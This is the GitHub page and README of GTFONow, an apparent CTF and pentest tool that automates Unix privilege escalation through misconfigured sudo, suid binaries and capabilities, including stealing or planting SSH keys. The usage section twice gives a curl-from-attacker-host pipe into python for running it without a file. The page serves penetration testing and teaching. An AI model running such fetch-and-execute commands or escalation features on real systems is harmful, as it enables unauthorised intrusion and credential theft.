Skip to content
/ GTFONow Public

Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.

License

MIT license
552 stars 71 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Frissi0n/GTFONow

BranchesTags

Repository files navigation

Main Branch

GTFONow

Automatic privilege escalation on unix systems by exploiting misconfigured setuid/setgid binaries, capabilities and sudo permissions. Designed for CTFs but also applicable in real world pentests.

asciicast

✅ Features

  • Automatically exploit misconfigured sudo permissions.
  • Automatically exploit misconfigured suid, sgid permissions.
  • Automatically exploit misconfigured capabilities.
  • Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
  • Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
  • Automatically convert arbitrary file write primitive into shell by writing to cron.
  • Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
  • Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python

💻 Usage

To use GTFONow, simply run the script from your command line. The basic syntax is as follows:

python gtfonow.py [OPTIONS]

It can also be run by piping the output of curl:

curl http://attacker.host/gtfonow.py | python

Options

  • --level: Sets the level of checks to perform. You can choose between:
    • 1 (default) for a quick scan.
    • 2 for a more thorough scan.
    • Example: python gtfonow.py --level 2
  • --risk: Specifies the risk level of the exploit to perform. The options are:
    • 1 (default) for safe operations.
    • 2 for more aggressive operations such as file modifications, primarily for use in CTFs, if using on real engagements, ensure you understand what this is doing.
    • Example: python gtfonow.py --risk 2
  • --command: Issues a single command instead of spawning an interactive shell. This is mainly for debugging purposes.
    • Example: python gtfonow.py --command 'ls -la'
  • --auto: Automatically exploits without user wizard.
  • -v, --verbose: Enables verbose output.
    • Example: python gtfonow.py --verbose

Compatibility

By design GTFONow is a backwards compatible, stdlib only python script, meaning it should work on any variant of Unix if Python is installed.

  • Python2.*
  • Python3.*
  • No 3rd party dependencies
  • Any Unix Variant (Linux, MacOS,*Nix)
  • Any architecture eg (X86/ARM64/X86-64)

🙏 Credits

About

Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.

Topics

security hacking pentesting ctf post-exploitation pentest offensive-security privilege-escalation ctf-tools security-tools redteam hackthebox gtfobins suid-binaries

Resources

Readme

License

MIT license
Activity

Stars

552 stars

Watchers

9 watching

Forks

71 forks
Report repository

Releases 4

v0.3.0 Latest
Jun 26, 2024
+ 3 releases

Contributors 4

Languages